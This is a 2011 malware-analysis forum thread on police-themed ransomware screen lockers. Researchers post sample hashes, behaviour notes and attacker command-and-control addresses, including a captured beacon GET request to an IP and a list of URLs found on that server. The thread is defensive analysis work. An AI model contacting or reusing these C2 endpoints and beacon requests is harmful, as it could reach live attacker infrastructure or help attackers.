Trojan Ransom / FakePoliceAlert

Forum for analysis and discussion about malware.
Post Reply
markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan Winlock / Ransom / ScreenLocker

Post by markusg » Mon Jun 20, 2011 8:56 am

You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Trojan Winlock / Ransom / ScreenLocker

Post by Xylitol » Mon Jun 20, 2011 10:30 am

Hello, in attach unpacked sample

Image

20/41 >> 48.8%
http://www.virustotal.com/file-scan/rep ... 1308565159
You do not have the required permissions to view the files attached to this post.

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Trojan Ransom / FakePoliceAlert

Post by markusg » Wed Oct 05, 2011 5:32 pm

You do not have the required permissions to view the files attached to this post.

User avatar
EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Malware/Not classified

Post by EP_X0FF » Wed Oct 05, 2011 5:46 pm

Trojan ransom

posts moved.
Ring0 - the source of inspiration

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan Winlock / Ransom / ScreenLocker

Post by markusg » Thu Oct 20, 2011 2:15 pm

explorer.exe
MD5   : 412cc709170aff1a15e895e16c397244
http://www.virustotal.com/file-scan/rep ... 1319118846
You do not have the required permissions to view the files attached to this post.

User avatar
EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Trojan Winlock / Ransom / ScreenLocker

Post by EP_X0FF » Thu Oct 20, 2011 2:53 pm

markusg wrote:explorer.exe
MD5   : 412cc709170aff1a15e895e16c397244
http://www.virustotal.com/file-scan/report.html?id=73f1f147380c03dad7fccfb5639e9d784d53f6a971821a772908d7aeb7f600f0-1319118846
Calls home hxxp://91.228.160.157/de/2/gate.php?cmd=ul&id=gpo5fv71j6hfh3x2

Replaces explorer.exe with malware copy.

Terminates taskmanager and process explorer.

In attach decrypted.
W:\locker\locker\Release\locker.pdb
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration

User avatar
Maxstar
Posts: 88
Joined: Wed Jan 26, 2011 10:20 am

Re: Trojan Winlock / Ransom / ScreenLocker

Post by Maxstar » Fri Nov 18, 2011 2:09 pm

You do not have the required permissions to view the files attached to this post.

User avatar
EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: Trojan Winlock / Ransom / ScreenLocker

Post by EP_X0FF » Fri Nov 18, 2011 2:29 pm

Interesting. Internally this sample looks equal to those posted by markusg earlier.
y:\src\_cpp\bwin_nl\Release\bwin3.pdb
Take a look on debug path string, bwin_nl.

Also the same call home address hxxp://89.248.165.131

The only difference is in resources part. Different HTML and images.

Fully decrypted workable sample in attach.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration

User avatar
S!Ri
Posts: 5
Joined: Fri Sep 02, 2011 7:36 am

Re: Trojan Ransom / FakePoliceAlert

Post by S!Ri » Mon Nov 21, 2011 8:37 am

Didn't see this spanish version (or I miss it):

Image
You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Trojan Ransom / FakePoliceAlert

Post by Xylitol » Tue Nov 22, 2011 6:06 pm

Image

Switzerland version
it do a GET req and call tools.ip2location.com as usual later

Code: Select all

GET /i.php?a=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible;)
Host: 89.248.165.131
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Tue, 22 Nov 2011 17:22:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Following url was found on the server:

Code: Select all

http://89.248.165.131:80/cgi-bin/
http://89.248.165.131:80/icons/
http://89.248.165.131:80/webmail/
http://89.248.165.131:80/error/
http://89.248.165.131:80/manager/
http://89.248.165.131:80/disabled/
You do not have the required permissions to view the files attached to this post.

Post Reply